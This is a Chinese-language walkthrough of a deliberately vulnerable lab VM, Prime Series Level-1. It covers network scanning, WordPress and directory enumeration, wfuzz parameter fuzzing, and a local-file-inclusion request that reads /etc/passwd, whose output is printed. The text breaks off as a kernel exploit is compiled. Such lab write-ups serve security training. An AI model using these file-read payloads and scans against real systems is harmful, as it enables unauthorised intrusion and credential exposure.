• Prime_Series_Level-1


    下载地址:点我

    哔哩哔哩:点我

    信息收集

    • 下载完解压后导入虚拟机,发现是一个Ubuntu,还是桌面版的
    • 把网卡设置为Host-Only,也就是vmnet1,网段为192.168.116.1/24
    • 先nmap扫存活主机
    ➜  ~ nmap -sn  192.168.116.1/24 
    Starting Nmap 7.80 ( https://nmap.org ) at 2019-09-20 07:16 CST
    Nmap scan report for 192.168.116.1
    Host is up (0.00044s latency).
    Nmap scan report for 192.168.116.132
    Host is up (0.00063s latency).
    Nmap done: 256 IP addresses (2 hosts up) scanned in 2.54 seconds
    ➜  ~
    
    • 找到IP为192.168.116.132,再扫开放端口服务。
    ➜  ~ nmap -A -T4 192.168.116.132
    Starting Nmap 7.80 ( https://nmap.org ) at 2019-09-20 07:17 CST
    Nmap scan report for 192.168.116.132
    Host is up (0.0013s latency).
    Not shown: 998 closed ports
    PORT   STATE SERVICE VERSION
    22/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0)
    | ssh-hostkey: 
    |   2048 8d:c5:20:23:ab:10:ca:de:e2:fb:e5:cd:4d:2d:4d:72 (RSA)
    |   256 94:9c:f8:6f:5c:f1:4c:11:95:7f:0a:2c:34:76:50:0b (ECDSA)
    |_  256 4b:f6:f1:25:b6:13:26:d4:fc:9e:b0:72:9f:f4:69:68 (ED25519)
    80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
    |_http-server-header: Apache/2.4.18 (Ubuntu)
    |_http-title: HacknPentest
    Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
    
    Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
    Nmap done: 1 IP address (1 host up) scanned in 7.13 seconds
    
    • 发现开放了80端口,一般突破点在Web,浏览器打开看到只有一张图片。F12无果。
    • 先上nikto扫一波。
    ➜  ~ nikto --host http://192.168.116.132/
    - Nikto v2.1.6
    ---------------------------------------------------------------------------
    + Target IP:          192.168.116.132
    + Target Hostname:    192.168.116.132
    + Target Port:        80
    + Start Time:         2019-09-20 07:22:14 (GMT8)
    ---------------------------------------------------------------------------
    + Server: Apache/2.4.18 (Ubuntu)
    + The anti-clickjacking X-Frame-Options header is not present.
    + The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
    + The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
    + No CGI Directories found (use '-C all' to force check all possible dirs)
    + Web Server returns a valid response with junk HTTP methods, this may cause false positives.
    + Server leaks inodes via ETags, header found with file /icons/README, fields: 0x13f4 0x438c034968a80 
    + OSVDB-3233: /icons/README: Apache default file found.
    + Uncommon header 'link' found, with contents: <http://192.168.116.132/wordpress/index.php?rest_route=/>; rel="https://api.w.org/"
    + /wordpress/: A Wordpress installation was found.
    + 7535 requests: 0 error(s) and 8 item(s) reported on remote host
    + End Time:           2019-09-20 07:22:26 (GMT8) (12 seconds)
    ---------------------------------------------------------------------------
    + 1 host(s) tested
    
    ➜  ~ wpscan --url http://192.168.116.132/wordpress/
    _______________________________________________________________
            __          _______   _____
                     / /  __  / ____|
                /  / /| |__) | (___   ___  __ _ _ __ ®
               /  / / |  ___/ \___  / __|/ _` | '_ 
                 /  /  | |     ____) | (__| (_| | | | |
                /  /   |_|    |_____/ \___|\__,_|_| |_|
    
            WordPress Security Scanner by the WPScan Team
                           Version 3.6.3
              Sponsored by Sucuri - https://sucuri.net
          @_WPScan_, @ethicalhack3r, @erwan_lr, @_FireFart_
    _______________________________________________________________
    
    [+] URL: http://192.168.116.132/wordpress/
    [+] Started: Fri Sep 20 07:56:20 2019
    
    Interesting Finding(s):
    
    [+] http://192.168.116.132/wordpress/
     | Interesting Entry: Server: Apache/2.4.18 (Ubuntu)
     | Found By: Headers (Passive Detection)
     | Confidence: 100%
    
    [+] http://192.168.116.132/wordpress/xmlrpc.php
     | Found By: Direct Access (Aggressive Detection)
     | Confidence: 100%
     | References:
     |  - http://codex.wordpress.org/XML-RPC_Pingback_API
     |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner
     |  - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos
     |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login
     |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access
    
    [+] http://192.168.116.132/wordpress/readme.html
     | Found By: Direct Access (Aggressive Detection)
     | Confidence: 100%
    
    [+] Upload directory has listing enabled: http://192.168.116.132/wordpress/wp-content/uploads/
     | Found By: Direct Access (Aggressive Detection)
     | Confidence: 100%
    
    [+] http://192.168.116.132/wordpress/wp-cron.php
     | Found By: Direct Access (Aggressive Detection)
     | Confidence: 60%
     | References:
     |  - https://www.iplocation.net/defend-wordpress-from-ddos
     |  - https://github.com/wpscanteam/wpscan/issues/1299
    
    [+] WordPress version 5.2.2 identified (Insecure, released on 2019-06-18).
     | Detected By: Rss Generator (Passive Detection)
     |  - http://192.168.116.132/wordpress/?feed=rss2, <generator>https://wordpress.org/?v=5.2.2</generator>
     |  - http://192.168.116.132/wordpress/?feed=comments-rss2, <generator>https://wordpress.org/?v=5.2.2</generator>
     |
     | [!] 6 vulnerabilities identified:
     |
     | [!] Title: WordPress 5.2.2 - Cross-Site Scripting (XSS) in Stored Comments
     |     Fixed in: 5.2.3
     |     References:
     |      - https://wpvulndb.com/vulnerabilities/9861
     |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-16218
     |      - https://wordpress.org/news/2019/09/wordpress-5-2-3-security-and-maintenance-release/
     |
     | [!] Title: WordPress 5.2.2 - Authenticated Cross-Site Scripting (XSS) in Post Previews
     |     Fixed in: 5.2.3
     |     References:
     |      - https://wpvulndb.com/vulnerabilities/9862
     |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-16223
     |      - https://wordpress.org/news/2019/09/wordpress-5-2-3-security-and-maintenance-release/
     |
     | [!] Title: WordPress 5.2.2 - Potential Open Redirect
     |     Fixed in: 5.2.3
     |     References:
     |      - https://wpvulndb.com/vulnerabilities/9863
     |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-16220
     |      - https://wordpress.org/news/2019/09/wordpress-5-2-3-security-and-maintenance-release/
     |      - https://github.com/WordPress/WordPress/commit/c86ee39ff4c1a79b93c967eb88522f5c09614a28
     |
     | [!] Title: WordPress 5.0-5.2.2 - Authenticated Stored XSS in Shortcode Previews
     |     Fixed in: 5.2.3
     |     References:
     |      - https://wpvulndb.com/vulnerabilities/9864
     |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-16219
     |      - https://wordpress.org/news/2019/09/wordpress-5-2-3-security-and-maintenance-release/
     |      - https://fortiguard.com/zeroday/FG-VD-18-165
     |      - https://www.fortinet.com/blog/threat-research/wordpress-core-stored-xss-vulnerability.html
     |
     | [!] Title: WordPress 5.2.2 - Cross-Site Scripting (XSS) in Dashboard
     |     Fixed in: 5.2.3
     |     References:
     |      - https://wpvulndb.com/vulnerabilities/9865
     |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-16221
     |      - https://wordpress.org/news/2019/09/wordpress-5-2-3-security-and-maintenance-release/
     |
     | [!] Title: WordPress <= 5.2.2 - Cross-Site Scripting (XSS) in URL Sanitisation
     |     Fixed in: 5.2.3
     |     References:
     |      - https://wpvulndb.com/vulnerabilities/9867
     |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-16222
     |      - https://wordpress.org/news/2019/09/wordpress-5-2-3-security-and-maintenance-release/
     |      - https://github.com/WordPress/WordPress/commit/30ac67579559fe42251b5a9f887211bf61a8ed68
    
    [+] WordPress theme in use: twentynineteen
     | Location: http://192.168.116.132/wordpress/wp-content/themes/twentynineteen/
     | Latest Version: 1.4 (up to date)
     | Last Updated: 2019-05-07T00:00:00.000Z
     | Readme: http://192.168.116.132/wordpress/wp-content/themes/twentynineteen/readme.txt
     | Style URL: http://192.168.116.132/wordpress/wp-content/themes/twentynineteen/style.css?ver=1.4
     | Style Name: Twenty Nineteen
     | Style URI: https://wordpress.org/themes/twentynineteen/
     | Description: Our 2019 default theme is designed to show off the power of the block editor. It features custom sty...
     | Author: the WordPress team
     | Author URI: https://wordpress.org/
     |
     | Detected By: Css Style (Passive Detection)
     |
     | Version: 1.4 (80% confidence)
     | Detected By: Style (Passive Detection)
     |  - http://192.168.116.132/wordpress/wp-content/themes/twentynineteen/style.css?ver=1.4, Match: 'Version: 1.4'
    
    [+] Enumerating All Plugins (via Passive Methods)
    
    [i] No plugins Found.
    
    [+] Enumerating Config Backups (via Passive and Aggressive Methods)
     Checking Config Backups - Time: 00:00:00 <==================================================================================================================================================================> (21 / 21) 100.00% Time: 00:00:00
    
    [i] No Config Backups Found.
    
    
    [+] Finished: Fri Sep 20 07:56:22 2019
    [+] Requests Done: 49
    [+] Cached Requests: 5
    [+] Data Sent: 12.599 KB
    [+] Data Received: 462.296 KB
    [+] Memory used: 184.582 MB
    [+] Elapsed time: 00:00:02
    ➜  ~
    
    • 没发现什么东西,发现一个目录索引枚举:http://192.168.116.132/wordpress/wp-content/uploads/2019/08/,继续扫目录。
    ➜  ~ dirb http://192.168.116.132/
    
    -----------------
    DIRB v2.22    
    By The Dark Raver
    -----------------
    
    START_TIME: Fri Sep 20 08:11:33 2019
    URL_BASE: http://192.168.116.132/
    WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt
    
    -----------------
    
    GENERATED WORDS: 4612                                                          
    
    ---- Scanning URL: http://192.168.116.132/ ----
    + http://192.168.116.132/dev (CODE:200|SIZE:131)                                                                                                                                                                                              
    + http://192.168.116.132/index.php (CODE:200|SIZE:136)                                                                                                                                                                                        
    ==> DIRECTORY: http://192.168.116.132/javascript/                                                                                                                                                                                             
    + http://192.168.116.132/server-status (CODE:403|SIZE:303)                                                                                                                                                                                    
    ==> DIRECTORY: http://192.168.116.132/wordpress/                                                                                                                                                                                              
                                                                                                                                                                                                                                                  
    ---- Entering directory: http://192.168.116.132/javascript/ ----
    ==> DIRECTORY: http://192.168.116.132/javascript/jquery/                                                                                                                                                                                      
                                                                                                                                                                                                                                                  
    ---- Entering directory: http://192.168.116.132/wordpress/ ----
    + http://192.168.116.132/wordpress/index.php (CODE:301|SIZE:0)                                                                                                                                                                                
    ==> DIRECTORY: http://192.168.116.132/wordpress/wp-admin/                                                                                                                                                                                     
    ==> DIRECTORY: http://192.168.116.132/wordpress/wp-content/                                                                                                                                                                                   
    ==> DIRECTORY: http://192.168.116.132/wordpress/wp-includes/                                                                                                                                                                                  
    + http://192.168.116.132/wordpress/xmlrpc.php (CODE:405|SIZE:42)                                                                                                                                                                              
                                                                                                                                                                                                                                                  
    ---- Entering directory: http://192.168.116.132/javascript/jquery/ ----
    + http://192.168.116.132/javascript/jquery/jquery (CODE:200|SIZE:284394)                                                                                                                                                                      
                                                                                                                                                                                                                                                  
    ---- Entering directory: http://192.168.116.132/wordpress/wp-admin/ ----
    + http://192.168.116.132/wordpress/wp-admin/admin.php (CODE:302|SIZE:0)                                                                                                                                                                       
    ==> DIRECTORY: http://192.168.116.132/wordpress/wp-admin/css/                                                                                                                                                                                 
    ==> DIRECTORY: http://192.168.116.132/wordpress/wp-admin/images/                                                                                                                                                                              
    ==> DIRECTORY: http://192.168.116.132/wordpress/wp-admin/includes/                                                                                                                                                                            
    + http://192.168.116.132/wordpress/wp-admin/index.php (CODE:302|SIZE:0)                                                                                                                                                                       
    ==> DIRECTORY: http://192.168.116.132/wordpress/wp-admin/js/                                                                                                                                                                                  
    ==> DIRECTORY: http://192.168.116.132/wordpress/wp-admin/maint/                                                                                                                                                                               
    ==> DIRECTORY: http://192.168.116.132/wordpress/wp-admin/network/                                                                                                                                                                             
    ==> DIRECTORY: http://192.168.116.132/wordpress/wp-admin/user/                                                                                                                                                                                
                                                                                                                                                                                                                                                  
    ---- Entering directory: http://192.168.116.132/wordpress/wp-content/ ----
    + http://192.168.116.132/wordpress/wp-content/index.php (CODE:200|SIZE:0)                                                                                                                                                                     
    ==> DIRECTORY: http://192.168.116.132/wordpress/wp-content/plugins/                                                                                                                                                                           
    ==> DIRECTORY: http://192.168.116.132/wordpress/wp-content/themes/                                                                                                                                                                            
    ==> DIRECTORY: http://192.168.116.132/wordpress/wp-content/uploads/                                                                                                                                                                           
                                                                                                                                                                                                                                                  
    ---- Entering directory: http://192.168.116.132/wordpress/wp-includes/ ----
    (!) WARNING: Directory IS LISTABLE. No need to scan it.                        
        (Use mode '-w' if you want to scan it anyway)
                                                                                                                                                                                                                                                  
    ---- Entering directory: http://192.168.116.132/wordpress/wp-admin/css/ ----
    (!) WARNING: Directory IS LISTABLE. No need to scan it.                        
        (Use mode '-w' if you want to scan it anyway)
                                                                                                                                                                                                                                                  
    ---- Entering directory: http://192.168.116.132/wordpress/wp-admin/images/ ----
    (!) WARNING: Directory IS LISTABLE. No need to scan it.                        
        (Use mode '-w' if you want to scan it anyway)
                                                                                                                                                                                                                                                  
    ---- Entering directory: http://192.168.116.132/wordpress/wp-admin/includes/ ----
    (!) WARNING: Directory IS LISTABLE. No need to scan it.                        
        (Use mode '-w' if you want to scan it anyway)
                                                                                                                                                                                                                                                  
    ---- Entering directory: http://192.168.116.132/wordpress/wp-admin/js/ ----
    (!) WARNING: Directory IS LISTABLE. No need to scan it.                        
        (Use mode '-w' if you want to scan it anyway)
                                                                                                                                                                                                                                                  
    ---- Entering directory: http://192.168.116.132/wordpress/wp-admin/maint/ ----
    (!) WARNING: Directory IS LISTABLE. No need to scan it.                        
        (Use mode '-w' if you want to scan it anyway)
                                                                                                                                                                                                                                                  
    ---- Entering directory: http://192.168.116.132/wordpress/wp-admin/network/ ----
    + http://192.168.116.132/wordpress/wp-admin/network/admin.php (CODE:302|SIZE:0)                                                                                                                                                               
    + http://192.168.116.132/wordpress/wp-admin/network/index.php (CODE:302|SIZE:0)                                                                                                                                                               
                                                                                                                                                                                                                                                  
    ---- Entering directory: http://192.168.116.132/wordpress/wp-admin/user/ ----
    + http://192.168.116.132/wordpress/wp-admin/user/admin.php (CODE:302|SIZE:0)                                                                                                                                                                  
    + http://192.168.116.132/wordpress/wp-admin/user/index.php (CODE:302|SIZE:0)                                                                                                                                                                  
                                                                                                                                                                                                                                                  
    ---- Entering directory: http://192.168.116.132/wordpress/wp-content/plugins/ ----
    + http://192.168.116.132/wordpress/wp-content/plugins/index.php (CODE:200|SIZE:0)                                                                                                                                                             
                                                                                                                                                                                                                                                  
    ---- Entering directory: http://192.168.116.132/wordpress/wp-content/themes/ ----
    + http://192.168.116.132/wordpress/wp-content/themes/index.php (CODE:200|SIZE:0)                                                                                                                                                              
                                                                                                                                                                                                                                                  
    ---- Entering directory: http://192.168.116.132/wordpress/wp-content/uploads/ ----
    (!) WARNING: Directory IS LISTABLE. No need to scan it.                        
        (Use mode '-w' if you want to scan it anyway)
                                                                                   
    -----------------
    END_TIME: Fri Sep 20 08:12:01 2019
    DOWNLOADED: 46120 - FOUND: 15
    ➜  ~
    
    • 发现有提示文件,找到了第0阶段。提示要用他们的工具去挖掘Web信息。
    ➜  ~ curl http://192.168.116.132/dev                                              
    hello,
    
    now you are at level 0 stage.
    
    In real life pentesting we should use our tools to dig on a web very hard.
    
    Happy hacking. 
    ➜  ~
    
    • 加上-X参数指定扫描的后缀名。
    ➜  ~ dirb http://192.168.116.132/ -X .php,.txt
    
    -----------------
    DIRB v2.22    
    By The Dark Raver
    -----------------
    
    START_TIME: Fri Sep 20 08:18:05 2019
    URL_BASE: http://192.168.116.132/
    WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt
    EXTENSIONS_LIST: (.php,.txt) | (.php)(.txt) [NUM = 2]
    
    -----------------
    
    GENERATED WORDS: 4612                                                          
    
    ---- Scanning URL: http://192.168.116.132/ ----
    + http://192.168.116.132/image.php (CODE:200|SIZE:147)                                                                
    + http://192.168.116.132/index.php (CODE:200|SIZE:136)                                                                
    + http://192.168.116.132/secret.txt (CODE:200|SIZE:412)                                                               
                                                                                                                          
    -----------------
    END_TIME: Fri Sep 20 08:18:10 2019
    DOWNLOADED: 9224 - FOUND: 3
    ➜  ~
    

    Fuzz

    • 发现另一个提示,准备好模糊测试的工具。
    ➜  ~ curl http://192.168.116.132/secret.txt     
    Looks like you have got some secrets.
    
    Ok I just want to do some help to you. 
    
    Do some more fuzz on every page of php which was finded by you. And if
    you get any right parameter then follow the below steps. If you still stuck 
    Learn from here a basic tool with good usage for OSCP.
    
    https://github.com/hacknpentest/Fuzzing/blob/master/Fuzz_For_Web
     
    
    
    //see the location.txt and you will get your next move//
    
    ➜  ~
    
    • 打开链接看到是一个wfuzz的教程,当然里面的字典没有给你,这里推荐两个fuzz的项目:https://github.com/fuzzdb-project/fuzzdbhttps://github.com/danielmiessler/SecLists有各种常见的字典,可以fork一个自己慢慢添加。一般我会在zshrc文件中设置环境变量指定字典目录,这样就不用敲目录了。
    • 和我之前写的一篇套路一模一样:点我参考,先找出文件再测试方法参数,和爆破一句话木马差不多。
    ➜  ~ wfuzz -c -w Kali-Team_Tools/fuzzdb/attack/business-logic/CommonMethodNames.txt 'http://192.168.116.132/index.php?FUZZ=/etc/passwd'        
    libraries.FileLoader: CRITICAL __load_py_from_file. Filename: /home/kali-team/.local/lib/python3.7/site-packages/wfuzz/plugins/payloads/bing.py Exception, msg=No module named 'shodan'
    libraries.FileLoader: CRITICAL __load_py_from_file. Filename: /home/kali-team/.local/lib/python3.7/site-packages/wfuzz/plugins/payloads/shodanp.py Exception, msg=No module named 'shodan'
    ********************************************************
    * Wfuzz 2.4 - The Web Fuzzer                           *
    ********************************************************
    
    Target: http://192.168.116.132/index.php?FUZZ=/etc/passwd
    Total requests: 77
    
    ===================================================================
    ID           Response   Lines    Word     Chars       Payload                                                                                                                                                                       
    ===================================================================
    
    000000001:   200        7 L      12 W     136 Ch      "0"                                                                                                                                                                           
    000000002:   200        7 L      12 W     136 Ch      "1"                                                                                                                                                                           
    000000003:   200        7 L      12 W     136 Ch      "add"                                                                                                                                                                         
    000000004:   200        7 L      12 W     136 Ch      "admin"                                                                                                                                                                       
    000000005:   200        7 L      12 W     136 Ch      "alert"                                                                                                                                                                       
    000000006:   200        7 L      12 W     136 Ch      "alter"                                                                                                                                                                       
    000000007:   200        7 L      12 W     136 Ch      "auth"                                                                                                                                                                        
    000000008:   200        7 L      12 W     136 Ch      "authenticate"                                                                                                                                                                
    000000009:   200        7 L      12 W     136 Ch      "append"                                                                                                                                                                      
    000000010:   200        7 L      12 W     136 Ch      "calc"                                                                                                                                                                        
    000000011:   200        7 L      12 W     136 Ch      "calculate"                                                                                                                                                                   
    000000012:   200        7 L      12 W     136 Ch      "cancel"                                                                                                                                                                      
    000000013:   200        7 L      12 W     136 Ch      "change"                                                                                                                                                                      
    000000014:   200        7 L      12 W     136 Ch      "check"                                                                                                                                                                       
    000000016:   200        7 L      12 W     136 Ch      "click"                                                                                                                                                                       
    000000015:   200        7 L      12 W     136 Ch      "clear"                                                                                                                                                                       
    000000017:   200        7 L      12 W     136 Ch      "clone"                                                                                                                                                                       
    000000018:   200        7 L      12 W     136 Ch      "close"                                                                                                                                                                       
    000000019:   200        7 L      12 W     136 Ch      "create"                                                                                                                                                                      
    000000020:   200        7 L      12 W     136 Ch      "crypt"                                                                                                                                                                       
    000000021:   200        7 L      12 W     136 Ch      "decrypt"                                                                                                                                                                     
    000000022:   200        7 L      12 W     136 Ch      "del"                                                                                                                                                                         
    000000023:   200        7 L      12 W     136 Ch      "delete"                                                                                                                                                                      
    000000024:   200        7 L      12 W     136 Ch      "demo"                                                                                                                                                                        
    000000025:   200        7 L      12 W     136 Ch      "disable"                                                                                                                                                                     
    000000026:   200        7 L      12 W     136 Ch      "dl"                                                                                                                                                                          
    000000027:   200        7 L      12 W     136 Ch      "download"                                                                                                                                                                    
    000000029:   200        7 L      12 W     136 Ch      "enable"                                                                                                                                                                      
    000000030:   200        7 L      12 W     136 Ch      "encrypt"                                                                                                                                                                     
    000000028:   200        7 L      12 W     136 Ch      "edit"                                                                                                                                                                        
    000000031:   200        7 L      12 W     136 Ch      "exec"                                                                                                                                                                        
    000000032:   200        7 L      12 W     136 Ch      "execute"                                                                                                                                                                     
    000000033:   200        7 L      19 W     206 Ch      "file"                                                                                                                                                                        
    000000034:   200        7 L      12 W     136 Ch      "focus"                                                                                                                                                                       
    000000035:   200        7 L      12 W     136 Ch      "get"                                                                                                                                                                         
    000000036:   200        7 L      12 W     136 Ch      "help"                                                                                                                                                                        
    000000037:   200        7 L      12 W     136 Ch      "initiate"                                                                                                                                                                    
    000000038:   200        7 L      12 W     136 Ch      "is"                                                                                                                                                                          
    000000041:   200        7 L      12 W     136 Ch      "ls"                                                                                                                                                                          
    000000042:   200        7 L      12 W     136 Ch      "make"                                                                                                                                                                        
    000000043:   200        7 L      12 W     136 Ch      "mod"                                                                                                                                                                         
    000000044:   200        7 L      12 W     136 Ch      "mode"                                                                                                                                                                        
    000000046:   200        7 L      12 W     136 Ch      "move"                                                                                                                                                                        
    000000047:   200        7 L      12 W     136 Ch      "new"                                                                                                                                                                         
    000000048:   200        7 L      12 W     136 Ch      "off"                                                                                                                                                                         
    000000049:   200        7 L      12 W     136 Ch      "on"                                                                                                                                                                          
    000000039:   200        7 L      12 W     136 Ch      "list"                                                                                                                                                                        
    000000040:   200        7 L      12 W     136 Ch      "load"                                                                                                                                                                        
    000000045:   200        7 L      12 W     136 Ch      "modify"                                                                                                                                                                      
    000000050:   200        7 L      12 W     136 Ch      "open"                                                                                                                                                                        
    000000054:   200        7 L      12 W     136 Ch      "put"                                                                                                                                                                         
    000000055:   200        7 L      12 W     136 Ch      "query"                                                                                                                                                                       
    000000056:   200        7 L      12 W     136 Ch      "read"                                                                                                                                                                        
    000000051:   200        7 L      12 W     136 Ch      "post"                                                                                                                                                                        
    000000052:   200        7 L      12 W     136 Ch      "proxy"                                                                                                                                                                       
    000000053:   200        7 L      12 W     136 Ch      "pull"                                                                                                                                                                        
    000000062:   200        7 L      12 W     136 Ch      "save"                                                                                                                                                                        
    000000058:   200        7 L      12 W     136 Ch      "rename"                                                                                                                                                                      
    000000060:   200        7 L      12 W     136 Ch      "retrieve"                                                                                                                                                                    
    000000061:   200        7 L      12 W     136 Ch      "run"                                                                                                                                                                         
    000000057:   200        7 L      12 W     136 Ch      "remove"                                                                                                                                                                      
    000000059:   200        7 L      12 W     136 Ch      "reset"                                                                                                                                                                       
    000000063:   200        7 L      12 W     136 Ch      "search"                                                                                                                                                                      
    000000064:   200        7 L      12 W     136 Ch      "send"                                                                                                                                                                        
    000000065:   200        7 L      12 W     136 Ch      "shell"                                                                                                                                                                       
    000000066:   200        7 L      12 W     136 Ch      "show"                                                                                                                                                                        
    000000070:   200        7 L      12 W     136 Ch      "to"                                                                                                                                                                          
    000000071:   200        7 L      12 W     136 Ch      "toggle"                                                                                                                                                                      
    000000072:   200        7 L      12 W     136 Ch      "update"                                                                                                                                                                      
    000000073:   200        7 L      12 W     136 Ch      "upload"                                                                                                                                                                      
    000000074:   200        7 L      12 W     136 Ch      "verify"                                                                                                                                                                      
    000000075:   200        7 L      12 W     136 Ch      "view"                                                                                                                                                                        
    000000076:   200        7 L      12 W     136 Ch      "vrfy"                                                                                                                                                                        
    000000067:   200        7 L      12 W     136 Ch      "snd"                                                                                                                                                                         
    000000068:   200        7 L      12 W     136 Ch      "subtract"                                                                                                                                                                    
    000000069:   200        7 L      12 W     136 Ch      "test"                                                                                                                                                                        
    000000077:   200        7 L      12 W     136 Ch      "with"                                                                                                                                                                        
    
    Total time: 0.083242
    Processed Requests: 77
    Filtered Requests: 0
    Requests/sec.: 925.0118
    
    ➜  ~ wfuzz -c --hh 136 -w Kali-Team_Tools/fuzzdb/attack/business-logic/CommonMethodNames.txt 'http://192.168.116.132/index.php?FUZZ=/etc/passwd'
    libraries.FileLoader: CRITICAL __load_py_from_file. Filename: /home/kali-team/.local/lib/python3.7/site-packages/wfuzz/plugins/payloads/bing.py Exception, msg=No module named 'shodan'
    libraries.FileLoader: CRITICAL __load_py_from_file. Filename: /home/kali-team/.local/lib/python3.7/site-packages/wfuzz/plugins/payloads/shodanp.py Exception, msg=No module named 'shodan'
    ********************************************************
    * Wfuzz 2.4 - The Web Fuzzer                           *
    ********************************************************
    
    Target: http://192.168.116.132/index.php?FUZZ=/etc/passwd
    Total requests: 77
    
    ===================================================================
    ID           Response   Lines    Word     Chars       Payload                                                                                                                                                                       
    ===================================================================
    
    000000033:   200        7 L      19 W     206 Ch      "file"                                                                                                                                                                        
    
    Total time: 0.118026
    Processed Requests: 77
    Filtered Requests: 76
    Requests/sec.: 652.3932
    ➜  ~
    
    • fuzz出来index.php可以接受file参数,http://192.168.116.132/index.php?file=/ect/passed,和之前的首页长度不同。在上面提示中可以试着读取http://192.168.116.132/index.php?file=location.txt,又发现一个提示。
    ➜  ~ curl http://192.168.116.132/index.php?file=location.txt                                 
    <html>
    <title>HacknPentest</title>
    <body>
     <img src='hacknpentest.png' alt='hnp security' width="1300" height="595" />
    </body>
    
    Do something better <br><br><br><br><br><br>ok well Now you reah at the exact parameter <br><br>Now dig some more for next one <br>use 'secrettier360' parameter on some other php page for more fun.
    </html>
    ➜  ~
    
    • 提示到其他页面测试secrettier360这个参数,在dirb扫出来的一个就两个特殊的php文件。所以就是http://192.168.116.132/image.php,加上secrettier360继续fuzz测试。发现存在任意文件读取http://192.168.116.132/image.php?secrettier360=/etc/passwd,读取/etc/passed
    ➜  ~ curl http://192.168.116.132/image.php?secrettier360=/etc/passwd                                                    
    <html>
    <title>HacknPentest</title>
    <body>
     <img src='hacknpentest.png' alt='hnp security' width="1300" height="595" /></p></p></p>
    </body>
    finaly you got the right parameter<br><br><br><br>root:x:0:0:root:/root:/bin/bash
    daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
    bin:x:2:2:bin:/bin:/usr/sbin/nologin
    sys:x:3:3:sys:/dev:/usr/sbin/nologin
    sync:x:4:65534:sync:/bin:/bin/sync
    games:x:5:60:games:/usr/games:/usr/sbin/nologin
    man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
    lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
    mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
    news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
    uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
    proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
    www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
    backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
    list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
    irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
    gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
    nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
    systemd-timesync:x:100:102:systemd Time Synchronization,,,:/run/systemd:/bin/false
    systemd-network:x:101:103:systemd Network Management,,,:/run/systemd/netif:/bin/false
    systemd-resolve:x:102:104:systemd Resolver,,,:/run/systemd/resolve:/bin/false
    systemd-bus-proxy:x:103:105:systemd Bus Proxy,,,:/run/systemd:/bin/false
    syslog:x:104:108::/home/syslog:/bin/false
    _apt:x:105:65534::/nonexistent:/bin/false
    messagebus:x:106:110::/var/run/dbus:/bin/false
    uuidd:x:107:111::/run/uuidd:/bin/false
    lightdm:x:108:114:Light Display Manager:/var/lib/lightdm:/bin/false
    whoopsie:x:109:117::/nonexistent:/bin/false
    avahi-autoipd:x:110:119:Avahi autoip daemon,,,:/var/lib/avahi-autoipd:/bin/false
    avahi:x:111:120:Avahi mDNS daemon,,,:/var/run/avahi-daemon:/bin/false
    dnsmasq:x:112:65534:dnsmasq,,,:/var/lib/misc:/bin/false
    colord:x:113:123:colord colour management daemon,,,:/var/lib/colord:/bin/false
    speech-dispatcher:x:114:29:Speech Dispatcher,,,:/var/run/speech-dispatcher:/bin/false
    hplip:x:115:7:HPLIP system user,,,:/var/run/hplip:/bin/false
    kernoops:x:116:65534:Kernel Oops Tracking Daemon,,,:/:/bin/false
    pulse:x:117:124:PulseAudio daemon,,,:/var/run/pulse:/bin/false
    rtkit:x:118:126:RealtimeKit,,,:/proc:/bin/false
    saned:x:119:127::/var/lib/saned:/bin/false
    usbmux:x:120:46:usbmux daemon,,,:/var/lib/usbmux:/bin/false
    victor:x:1000:1000:victor,,,:/home/victor:/bin/bash
    mysql:x:121:129:MySQL Server,,,:/nonexistent:/bin/false
    saket:x:1001:1001:find password.txt file in my directory:/home/saket:
    sshd:x:122:65534::/var/run/sshd:/usr/sbin/nologin
    guest-uw1hdg:x:999:999:Guest:/tmp/guest-uw1hdg:/bin/bash
    </html>
    ➜  ~
    
    • 有一个访客的账号,还有一个victor账号,然后发现访客账号可以直接登录,在正常情况下是不可能可以登录到服务器的。在服务器开放了VNC服务,才有可能登录访客账号。
    root:x:0:0:root:/root:/bin/bash
    victor:x:1000:1000:victor,,,:/home/victor:/bin/bash
    guest-uw1hdg:x:999:999:Guest:/tmp/guest-uw1hdg:/bin/bash
    saket:x:1001:1001:find password.txt file in my directory:/home/saket:
    
    • 登录进访客账号,发现/opt目录下有一个服务器备份文件夹
    your password for backup_database file enc is 
    
    "backup_password"
    
    
    Enjoy!
    
    • 后来查看Linux版本,发现可以直接提权。额,这样就很没意思了,本来就很没意思。反正到最后还是要用到EXP去提权的,但是不是直接登录访客账号。而且访客提权还把Web服务提挂了。
    guest-uw1hdg@ubuntu:~/Desktop$ gcc exp.c 
